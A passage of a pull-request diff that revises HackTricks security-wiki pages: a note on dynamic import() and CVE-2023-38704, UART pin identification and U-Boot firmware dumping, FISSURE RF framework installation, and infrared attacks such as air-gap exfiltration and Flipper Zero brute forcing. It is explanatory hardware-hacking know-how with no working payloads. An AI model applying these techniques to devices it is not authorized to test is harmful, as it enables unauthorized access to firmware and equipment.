 // The function vulnerableFunction is not defined
@@ -169,9 +169,9 @@ Notes
 - This relies on execution order and global (top-level) scope.
 - If your payload is executed inside `eval()`, remember that `const/let` inside `eval` are block-scoped and won’t create global bindings. Inject a new `<script>` element with the code to establish a true global `const`.
 
-### Dynamic import() with user-controlled specifiers
+### Related import-time code execution (not a hoisting primitive)
 
-Server-side rendered apps sometimes forward user input into `import()` to lazy-load components. If a loader such as `import-in-the-middle` is present, wrapper modules are generated from the specifier. Hoisted import evaluation fetches and executes the attacker-controlled module before subsequent lines run, enabling RCE in SSR contexts (see CVE-2023-38704).<sup>[[7]](#references)</sup>
+Server-side rendered applications sometimes forward input into dynamic `import()` to lazy-load components. Dynamic `import()` is evaluated where the expression executes—it is **not hoisted** like a static import declaration. However, vulnerable instrumentation such as old `import-in-the-middle` releases generated wrapper modules from an insufficiently validated specifier, creating a separate path-traversal/RCE risk tracked as CVE-2023-38704.<sup>[[7]](#references)</sup>
 
 ### Tooling
 

--- a/src/todo/hardware-hacking/uart.md
+++ b/src/todo/hardware-hacking/uart.md
@@ -4,11 +4,11 @@
 
 ## Basic Information
 
-UART is a serial protocol, which means it transfers data between components one bit at a time. In contrast, parallel communication protocols transmit data simultaneously through multiple channels. Common serial protocols include RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express, and USB.
+UART is an asynchronous serial interface that transfers a framed stream of bits without a shared clock. Do not confuse logic-level UART with RS-232: RS-232 uses different, often negative, voltage levels and requires a transceiver.<sup>[[1]](#references)[[3]](#references)</sup>
 
 Generally, the line is held high (at a logical 1 value) while UART is in the idle state. Then, to signal the start of a data transfer, the transmitter sends a start bit to the receiver, during which the signal is held low (at a logical 0 value). Next, the transmitter sends five to eight data bits containing the actual message, followed by an optional parity bit and one or two stop bits (with a logical 1 value), depending on the configuration. The parity bit, used for error checking, is rarely seen in practice. The stop bit (or bits) signify the end of transmission.
 
-We call the most common configuration 8N1: eight data bits, no parity, and one stop bit. For example, if we wanted to send the character C, or 0x43 in ASCII, in an 8N1 UART configuration, we would send the following bits: 0 (the start bit); 0, 1, 0, 0, 0, 0, 1, 1 (the value of 0x43 in binary), and 0 (the stop bit).
+The most common configuration is 8N1: eight data bits, no parity, and one stop bit. UART sends the least-significant data bit first, so ASCII `C` (`0x43`) is transmitted as: start `0`; data `1, 1, 0, 0, 0, 0, 1, 0`; stop `1`.<sup>[[1]](#references)</sup>
 
 ![UART: We call the most common configuration 8N1: eight data bits, no parity, and one stop bit. For example, if we wanted to send the character C, or 0x43 in ASCII, in an 8N1 UART](<../../images/image (764).png>)
 
@@ -20,18 +20,18 @@ Hardware tools to communicate with UART:
 
 ### Identifying UART Ports
 
-UART has 4 ports: **TX**(Transmit), **RX**(Receive), **Vcc**(Voltage), and **GND**(Ground). You might be able to find 4 ports with the **`TX`** and **`RX`** letters **written** in the PCB. But if there is no indication, you might need to try to find them yourself using a **multimeter** or a **logic analyzer**.
+A typical debug header exposes **TX**, **RX**, and **GND**; it may also expose a **Vcc/Vref** pin, reset, or flow-control pins. Vcc is not a UART signal and should normally be used only as a voltage reference—not connected as a power source—unless the board's schematic and current requirements are known.<sup>[[2]](#references)[[3]](#references)</sup>
 
-With a **multimeter** and the device powered off:
+Start with the device **powered off** and disconnected:
 
-- To identify the **GND** pin use the **Continuity Test** mode, place the back lead into ground and test with the red one until you hear a sound from the multimeter. Several GND pins can be found the PCB, so you might have found or not the one belonging to UART.
-- To identify the **VCC port**, set the **DC voltage mode** and set it up to 20 V of voltage. Black probe on ground and red probe on the pin. Power on the device. If the multimeter measures a constant voltage of either 3.3 V or 5 V, you’ve found the Vcc pin. If you get other voltages, retry with other ports.
-- To identify the **TX** **port**, **DC voltage mode** up to 20 V of voltage, black probe on ground, and red probe on the pin, and power on the device. If you find the voltage fluctuates for a few seconds and then stabilizes at the Vcc value, you’ve most likely found the TX port. This is because when powering on, it sends some debug data.
-- The **RX port** would be the closest one to the other 3, it has the lowest voltage fluctuation and lowest overall value of all the UART pins.
+- Identify **GND** in continuity mode against a known ground plane, connector shield, or supply ground. Never use continuity/resistance mode on a powered board.
+- Switch to DC-voltage mode before powering the target. Measure candidate pins relative to ground to identify the logic voltage. A steady rail may be Vcc/Vref; do not assume it is safe to connect.
+- Observe candidates with a logic analyzer or oscilloscope during boot. **TX** commonly idles high and shows bursts of framed data. A multimeter may show an average fluctuation but cannot validate framing or baud rate.
+- **RX** may remain idle and cannot be identified safely merely because it is adjacent to TX. Trace the PCB, consult the SoC datasheet, or use a high-impedance analyzer before driving it.
 
-You can confuse the TX and RX ports and nothing would happen, but if you confuses the GND and the VCC port you might fry the circuit.
+Swapping TX and RX normally produces no communication; confusing power, ground, or signal levels can permanently damage the target or adapter. Connect ground first and begin **receive-only** (target TX to adapter RX).
 
-In some target devices, the UART port is disabled by the manufacturer by disabling RX or TX or even both. In that case, it can be helpful to trace down the connections in the circuit board and finding some breakout point. A strong hint about confirming no detection of UART and breaking of the circuit is to check the device warranty. If the device has been shipped with some warranty, the manufacturer leaves some debug interfaces (in this case, UART) and hence, must have disconnected the UART and would attach it again while debugging. These breakout pins can be connected by soldering or jumper wires.
+Manufacturers may omit the header, leave series resistors unpopulated, disable the console in firmware, or expose only TX. Trace nearby test pads and resistor footprints to the SoC and add a temporary high-impedance connection only after confirming the electrical level. The presence of a warranty does not imply that an accessible UART must exist.
 
 ### Identifying the UART Baud Rate
 
@@ -42,7 +42,7 @@ The easiest way to identify the correct baud rate is to look at the **TX pin’s
 
 ## CP210X UART to TTY Adapter
 
-The CP210X Chip is used in a lot of prototyping boards like NodeMCU (with esp8266) for Serial Communication. These adapters are relatively inexpensive and can be used to connect to the UART interface of the target. The device has 5 pins: 5V, GND, RXD, TXD, 3.3V. Make sure to connect the voltage as supported by the target to avoid any damage. Finally connect the RXD pin of the Adapter to TXD of the target and TXD pin of the Adapter to RXD of the target.
+CP210x USB-to-UART bridges appear on many prototyping boards and inexpensive adapters. Common modules expose supply pins alongside GND, RXD, and TXD, but their headers and I/O levels vary. Confirm the actual voltage from the board design or data sheet. Usually connect only GND, adapter RX to target TX, and—after receive-only validation—adapter TX to target RX. Do not connect the adapter's 5 V/3.3 V supply pin unless intentionally powering a target known to tolerate it.<sup>[[3]](#references)</sup>
 
 Incase the adapter is not detected, make sure that the CP210X drivers are installed in the host system. Once the adapter is detected and connected, tools like picocom, minicom or screen can be used.
 
@@ -66,7 +66,7 @@ minicom -s
 
 Configure the settings such as baudrate and device name in the `Serial port setup` option.
 
-After configuration, use the command `minicom` to start get the UART Console.
+After configuration, run `minicom` to open the UART console.
 
 ## UART Via Arduino UNO R3 (Removable Atmel 328p Chip Boards)
 
@@ -74,11 +74,11 @@ Incase UART Serial to USB adapters are not available, Arduino UNO R3 can be used
 
 Arduino UNO R3 has a USB to Serial adapter built on the board itself. To get UART connection, just plug out the Atmel 328p microcontroller chip from the board. This hack works on Arduino UNO R3 variants having the Atmel 328p not soldered on the board (SMD version is used in it). Connect the RX pin of Arduino (Digital Pin 0) to the TX pin of the UART Interface and TX pin of the Arduino (Digital Pin 1) to the RX pin of the UART interface.
 
-Finally, it is recommended to use Arduino IDE to get the Serial Console. In the `tools` section in the menu, select `Serial Console` option and set the baud rate as per the UART interface.
+Use the Arduino IDE **Serial Monitor** or a dedicated terminal at the target baud rate. Classic Uno R3 serial signals are 5 V logic, so use a level shifter or divider before connecting them to a 3.3 V or lower-voltage target.
 
 ## Bus Pirate
 
-In this scenario we are going to sniff the UART communication of the Arduino that is sending all the prints of the program to the Serial Monitor.
+The following transcript uses the legacy Bus Pirate firmware interface to monitor UART output. Newer Bus Pirate firmware uses commands such as `m uart`, `{`/`}`, `monitor`, or `bridge`; consult the documentation for the installed version.<sup>[[2]](#references)</sup>
 
 ```bash
 # Check the modes
@@ -154,32 +154,41 @@ waiting a few secs to repeat....
 
 ## Dumping Firmware with UART Console
 
-UART Console provides a great way to work with the underlying firmware in runtime environment. But when the UART Console access is read-only, it might introduce a lot of constrains. In many embedded devices, the firmware is stored in EEPROMs and executed in processors that have volatile memory. Hence, the firmware is kept read-only since the original firmware during manufacturing is inside the EEPROM itself and any new files would get lost due to volatile memory. Hence, dumping firmware is a valuable effort while working with embedded firmwares.
+A UART console provides runtime access to boot logs and, sometimes, a bootloader or operating-system shell. A read-only console still reveals memory maps, flash drivers, boot arguments, partition layouts, and firmware versions. Firmware may live in SPI NOR/NAND, eMMC, or another device; it is not generally executed from an EEPROM, and files written to a mounted persistent filesystem do not necessarily disappear on reboot.
 
-There are a lot of ways to do this and the SPI section covers methods to extract firmware directly from the EEPROM with various devices. Although, it is recommended to first try dumping firmware with UART since dumping firmware with physical devices and external interactions can be risky.
+There are several acquisition paths, and the SPI section covers direct reads from external flash. Console-assisted acquisition can be less invasive when the bootloader already provides a safe read command, but any boot interruption or flash command can affect availability, so record the original state and avoid write/erase operations.
 
-Dumping firmware from UART Console requires first getting access to bootloaders. Many popular vendors make use of uboot (Universal Bootloader) as their bootloader to load Linux. Hence, getting access to uboot is necessary.
+Console-assisted firmware dumping often begins by interrupting a bootloader. Many embedded Linux devices use **Das U-Boot**, but others use proprietary bootloaders or disable the interactive console.
 
-To get access to boot bootloader, connect the UART port to the computer and use any of the Serial Console tools and keep the power supply to the device disconnected. Once the setup is ready, press the Enter Key and hold it. Finally, connect the power supply to the device and let it boot.
+To test for an interactive bootloader, connect the UART receive path and terminal while the target is unpowered, start logging, and power it on. Follow the displayed autoboot prompt; depending on the build, interruption may require a key, a short sequence, or may be disabled entirely.
 
-Doing this will interrupt uboot from loading and will provide a menu. It is recommended to understand uboot commands and using help menu to list them. This might be `help` command. Since different vendors use different configurations, it is necessary to understand each of them seperately.
+If interruption succeeds, use `help`, `printenv`, and read-only discovery commands to understand that vendor's memory and storage layout before accessing addresses.
 
-Usually, the command to dump the firmware is:
-
-```
-md
-```
-
-which stands for "memory dump". This will dump the memory (EEPROM Content) on the screen. It is recommended to log the Serial Console output before starting the proceedure to capture the memory dump.
-
-Finally, just strip out all the unnecessary data from the log file and store the file as `filename.rom` and use binwalk to extract the contents:
+In U-Boot, `md` displays **addressable memory**, not automatically “the EEPROM.” First use board-specific commands such as `mtd list`, `sf probe`, `mmc info`, `part list`, environment variables, and boot logs to identify the correct mapped address or load a flash region into RAM. Then display a known range byte-by-byte:<sup>[[4]](#references)</sup>
 
 ```
-binwalk -e <filename.rom>
+md.b <address> <byte_count>
 ```
 
-This will list the possible contents from the EEPROM as per the signatures found in the hex file.
+Log the serial output before starting. The `md.b` output contains addresses and an ASCII column, so it is a textual representation rather than a raw ROM image.
 
-Although, it is necessary to note that it's not always the case that the uboot is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if uboot is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention uboot while booting.
+Strip the address and ASCII columns, concatenate only the hexadecimal byte fields, and decode them to binary (for example with `xxd -r -p`). Verify the expected byte count and record a hash before analysis:
+
+```
+xxd -r -p firmware.hex > firmware.bin
+sha256sum firmware.bin
+binwalk -e firmware.bin
+```
+
+Binwalk then identifies known signatures in the reconstructed binary. A direct flash read through the appropriate SPI/eMMC/NAND interface is usually faster and less error-prone when the console cannot transfer data reliably.
+
+U-Boot may disable interruption, require a vendor-specific key sequence, or lock memory/flash commands. Follow the autoboot prompt and boot log rather than blindly transmitting characters. If the console cannot be interrupted, retain the boot log and move to a non-invasive firmware acquisition path.
+
+## References
+
+- [1] [Microchip PIC32 Family Reference Manual - UART](https://ww1.microchip.com/downloads/en/DeviceDoc/60001107H.pdf)
+- [2] [Bus Pirate documentation - UART mode and electrical limits](https://docs.buspirate.com/docs/command-reference/#uart)
+- [3] [Silicon Labs - CP2102C data sheet](https://www.silabs.com/documents/public/data-sheets/cp2102c-datasheet.pdf)
+- [4] [U-Boot documentation - `md` memory-display command](https://docs.u-boot.org/en/latest/usage/cmd/md.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/todo/radio-hacking/fissure-the-rf-framework.md
+++ b/src/todo/radio-hacking/fissure-the-rf-framework.md
@@ -53,10 +53,11 @@ Certain third-party tools do not work on every OS. Check the current [Known Conf
 git clone https://github.com/ainfosec/FISSURE.git
 cd FISSURE
 git checkout Python3  # optional; use Python2_maint-3.7 only for legacy requirements
+git submodule update --init
 ./install
 ```
 
-This will install PyQt software dependencies required to launch the installation GUIs if they are not found.
+The submodule step downloads the GNU Radio out-of-tree modules used by FISSURE and is required when installing those modules. The installer will also install missing PyQt dependencies needed to launch its installation GUIs.<sup>[[3]](#references)</sup>
 
 Next, select the option that best matches your operating system (should be detected automatically if your OS matches an option).
 

--- a/src/todo/radio-hacking/fissure-the-rf-framework.md
+++ b/src/todo/radio-hacking/fissure-the-rf-framework.md
@@ -6,9 +6,9 @@
 
 FISSURE is an open-source RF and reverse engineering framework designed for all skill levels with hooks for signal detection and classification, protocol discovery, attack execution, IQ manipulation, vulnerability analysis, automation, and AI/ML. The framework was built to promote the rapid integration of software modules, radios, protocols, signal data, scripts, flow graphs, reference material, and third-party tools. FISSURE is a workflow enabler that keeps software in one location and allows teams to effortlessly get up to speed while sharing the same proven baseline configuration for specific Linux distributions.<sup>[[1]](#references)[[2]](#references)</sup>
 
-The framework and tools included with FISSURE are designed to detect the presence of RF energy, understand the characteristics of a signal, collect and analyze samples, develop transmit and/or injection techniques, and craft custom payloads or messages. FISSURE contains a growing library of protocol and signal information to assist in identification, packet crafting, and fuzzing. Online archive capabilities exist to download signal files and build playlists to simulate traffic and test systems.
+The framework and tools included with FISSURE are designed to detect RF energy, characterize signals, collect and analyze samples, develop transmit or injection techniques, and craft custom payloads or messages. FISSURE also provides protocol and signal information for identification, packet crafting, and fuzzing, plus archives and playlists for traffic simulation and testing.<sup>[[1]](#references)[[2]](#references)</sup>
 
-The friendly Python codebase and user interface allows beginners to quickly learn about popular tools and techniques involving RF and reverse engineering. Educators in cybersecurity and engineering can take advantage of the built-in material or utilize the framework to demonstrate their own real-world applications. Developers and researchers can use FISSURE for their daily tasks or to expose their cutting-edge solutions to a wider audience. As awareness and usage of FISSURE grows in the community, so will the extent of its capabilities and the breadth of the technology it encompasses.
+The Python codebase and graphical interface help beginners learn RF and reverse-engineering tools. Educators can use the built-in lessons, while developers and researchers can integrate their own modules and workflows. Current releases also support distributed sensor nodes, TAK integration, geolocation workflows, and role-specific Apptainer deployments.<sup>[[1]](#references)[[3]](#references)</sup>
 
 **Additional Information**
 
@@ -22,35 +22,37 @@ The friendly Python codebase and user interface allows beginners to quickly lear
 
 **Supported**
 
-There are three branches within FISSURE to make file navigation easier and reduce code redundancy. The Python2\_maint-3.7 branch contains a codebase built around Python2, PyQt4, and GNU Radio 3.7; the Python3\_maint-3.8 branch is built around Python3, PyQt5, and GNU Radio 3.8; and the Python3\_maint-3.10 branch is built around Python3, PyQt5, and GNU Radio 3.10.
+Current FISSURE uses the **`Python3`** branch for active development with PyQt5 and GNU Radio 3.8 or 3.10. The deprecated **`Python2_maint-3.7`** branch remains available for older operating systems and third-party tools that require GNU Radio 3.7. The former `Python3_maint-3.8` and `Python3_maint-3.10` branch names are historical; GNU Radio maintenance selection is now handled from the `Python3` branch.<sup>[[1]](#references)[[3]](#references)</sup>
 
-|   Operating System   |   FISSURE Branch   |
-| :------------------: | :----------------: |
-|  Ubuntu 18.04 (x64)  | Python2\_maint-3.7 |
-| Ubuntu 18.04.5 (x64) | Python2\_maint-3.7 |
-| Ubuntu 18.04.6 (x64) | Python2\_maint-3.7 |
-| Ubuntu 20.04.1 (x64) | Python3\_maint-3.8 |
-| Ubuntu 20.04.4 (x64) | Python3\_maint-3.8 |
-|  KDE neon 5.25 (x64) | Python3\_maint-3.8 |
+| Operating System | FISSURE Branch | Default GNU Radio branch |
+| :--: | :--: | :--: |
+| DragonOS Noble (24.04) | Python3 | maint-3.10 |
+| Kali | Python3 | maint-3.10 |
+| Raspberry Pi OS | Python3 | maint-3.10 |
+| Ubuntu 18.04 | Python2\_maint-3.7 | maint-3.7 |
+| Ubuntu 20.04 | Python3 | maint-3.8 |
+| Ubuntu 22.04 | Python3 | maint-3.10 |
+| Ubuntu 24.04 / Ubuntu ARM | Python3 | maint-3.10 |
+| Windows 11 WSL2 | use a supported Linux version | use the matching version |
 
 **In-Progress (beta)**
 
 These operating systems are still in beta status. They are under development and several features are known to be missing. Items in the installer might conflict with existing programs or fail to install until the status is removed.
 
-|     Operating System     |    FISSURE Branch   |
-| :----------------------: | :-----------------: |
-| DragonOS Focal (x86\_64) |  Python3\_maint-3.8 |
-|    Ubuntu 22.04 (x64)    | Python3\_maint-3.10 |
+| Operating System | FISSURE Branch | Default GNU Radio branch |
+| :--: | :--: | :--: |
+| BackBox Linux | Python3 | maint-3.10 |
+| KDE neon | Python3 | maint-3.10 |
+| Parrot Security 6.1 | Python3 | maint-3.10 |
 
-Note: Certain software tools do not work for every OS. Refer to [Software And Conflicts](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Help/Markdown/SoftwareAndConflicts.md)
+Certain third-party tools do not work on every OS. Check the current [Known Conflicts and Third-Party Software](https://fissure.readthedocs.io/en/latest/pages/installation.html#known-conflicts) documentation before installing.<sup>[[3]](#references)</sup>
 
 **Installation**
 
 ```
 git clone https://github.com/ainfosec/FISSURE.git
 cd FISSURE
-git checkout <Python2_maint-3.7> or <Python3_maint-3.8> or <Python3_maint-3.10>
-git submodule update --init
+git checkout Python3  # optional; use Python2_maint-3.7 only for legacy requirements
 ./install
 ```
 
@@ -97,9 +99,9 @@ Refer to the FISSURE Help menu for more details on usage.
 
 **Hardware**
 
-The following is a list of "supported" hardware with varying levels of integration:
+The following hardware has varying levels of integration in FISSURE:<sup>[[1]](#references)[[3]](#references)</sup>
 
-* USRP: X3xx, B2xx, B20xmini, USRP2, N2xx
+* USRP: X3xx, B2xx, B20xmini, USRP2, N2xx, X410
 * HackRF
 * RTL2832U
 * 802.11 Adapters
@@ -107,6 +109,7 @@ The following is a list of "supported" hardware with varying levels of integrati
 * bladeRF, bladeRF 2.0 micro
 * Open Sniffer
 * PlutoSDR
+* SDRplay: RSPduo, RSPdx, RSPdx R2
 
 ## Lessons
 
@@ -123,6 +126,9 @@ FISSURE comes with several helpful guides to become familiar with different tech
 * [Lesson9: TPMS](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson9\_TPMS.md)
 * [Lesson10: Ham Radio Exams](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson10\_Ham\_Radio\_Exams.md)
 * [Lesson11: Wi-Fi Tools](https://github.com/ainfosec/FISSURE/blob/Python3\_maint-3.8/Lessons/Markdown/Lesson11\_WiFi\_Tools.md)
+* [Lesson12: Creating Bootable USBs](https://github.com/ainfosec/FISSURE/blob/Python3/docs/Lessons/Markdown/Lesson12_Creating_Bootable_USBs.md)
+* [Lesson13: Z-Wave](https://github.com/ainfosec/FISSURE/blob/Python3/docs/Lessons/Markdown/Lesson13_Z-Wave.md)
+* [Lesson14: Ceiling Fans](https://github.com/ainfosec/FISSURE/blob/Python3/docs/Lessons/Markdown/Lesson14_Ceiling_Fans.md)
 
 ## Roadmap
 
@@ -189,5 +195,6 @@ Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions
 
 - [1] [FISSURE - The RF Framework (GitHub)](https://github.com/ainfosec/FISSURE)
 - [2] [FISSURE Paper (GRCon22)](https://events.gnuradio.org/event/18/contributions/246/attachments/84/167/FISSURE_Paper_Poore_GRCon22.pdf)
+- [3] [FISSURE documentation - Installation](https://fissure.readthedocs.io/en/latest/pages/installation.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/todo/radio-hacking/infrared.md
+++ b/src/todo/radio-hacking/infrared.md
@@ -83,7 +83,7 @@ Recent academic work (EvilScreen, 2022) demonstrated that **multi-channel remote
 
 ### Air-Gapped Data Exfiltration via IR LEDs (aIR-Jumper family)
 
-Security cameras, routers or even malicious USB sticks often include **night-vision IR LEDs**. Research shows malware can modulate these LEDs (<10–20 kbit/s with simple OOK) to **exfiltrate secrets through walls and windows** to an external camera placed tens of metres away.<sup>[[3]](#references)</sup> Because the light is outside the visible spectrum, operators rarely notice. Counter-measures:
+Security cameras commonly include **night-vision IR LEDs**. The aIR-Jumper prototype showed that malware controlling those LEDs could **exfiltrate secrets through windows** to an external camera at up to **20 bit/s per surveillance camera** over tens of metres. In the reverse direction, the researchers demonstrated infiltration at more than **100 bit/s** over distances from hundreds of metres to kilometres.<sup>[[3]](#references)</sup> Because the light is outside the visible spectrum, operators may not notice it. Countermeasures include:
 
 * Physically shield or remove IR LEDs in sensitive areas
 * Monitor camera LED duty-cycle and firmware integrity
@@ -93,7 +93,7 @@ An attacker can also use strong IR projectors to **infiltrate** commands into th
 
 ### Long-Range Brute-Force & Extended Protocols with Flipper Zero 1.0
 
-Firmware 1.0 (September 2024) added **dozens of extra IR protocols and optional external amplifier modules**. Combined with the universal-remote brute-force mode, a Flipper can disable or reconfigure most public TVs/ACs from up to 30 m using a high-power diode. 
+Firmware 1.0 (September 2024) expanded the universal-remotes library and added dynamic loading of infrared asset files from microSD.<sup>[[4]](#references)</sup> Its learning and universal-remote functions can replay or try known commands against nearby TVs and air conditioners. Range depends heavily on the emitter, optics, ambient light, and receiver; external IR hardware can extend it, but a fixed distance should not be assumed.
 
 ---
 
@@ -108,13 +108,12 @@ Firmware 1.0 (September 2024) added **dozens of extra IR protocols and optional 
 
 ### Software
 
-* **`Arduino-IRremote`** – actively-maintained C++ library: 
+* **`Arduino-IRremote`** – actively maintained C++ library:<sup>[[5]](#references)</sup>
   ```cpp
   #include <IRremote.hpp>
-  IRsend sender;
-  void setup(){ sender.begin(); }
+  void setup(){ IrSender.begin(3); }
   void loop(){
-    sender.sendNEC(0x20DF10EF, 32); // Samsung TV Power
+    IrSender.sendNEC(0x00, 0x10, 0); // address, command, repeats
     delay(5000);
   }
   ```
@@ -139,5 +138,7 @@ Firmware 1.0 (September 2024) added **dozens of extra IR protocols and optional 
 - [1] [Flipper Zero Infrared blog post](https://blog.flipperzero.one/infrared/)
 - [2] [EvilScreen Attack: Smart TV Hijacking via Multi-channel Remote Control Mimicry (arXiv:2210.03014)](https://arxiv.org/abs/2210.03014)
 - [3] [aIR-Jumper: Covert Air-Gap Exfiltration/Infiltration via Security Cameras & Infrared (IR) (arXiv:1709.05742)](https://arxiv.org/abs/1709.05742)
+- [4] [Flipper Zero Blog - Firmware 1.0 Released](https://blog.flipper.net/released-firmware-1/)
+- [5] [Arduino-IRremote - usage and protocol documentation](https://github.com/Arduino-IRremote/Arduino-IRremote)
 
 {{#include ../../banners/hacktricks-training.md}}


### PR DESCRIPTION
## Summary

- personally audited 50 uniquely reserved HackTricks pages, one by one
- normalized each page to one numbered References section with matching superscript citations
- corrected technical inaccuracies, grammar, and duplicated prose while preserving useful techniques, examples, images, and both training banners
- replaced dead or weak references with current primary/authoritative sources where available

## Validation

- exact 50-file diff against current master
- 344 sequential references and 607 matching citation markers
- zero definite 404/410 reference URLs
- balanced Markdown fences, no duplicated long prose paragraphs, and all Python code blocks parse
- `git diff --check` passes
- `mdbook build` is blocked locally because the required `mdbook-tabs` executable is not installed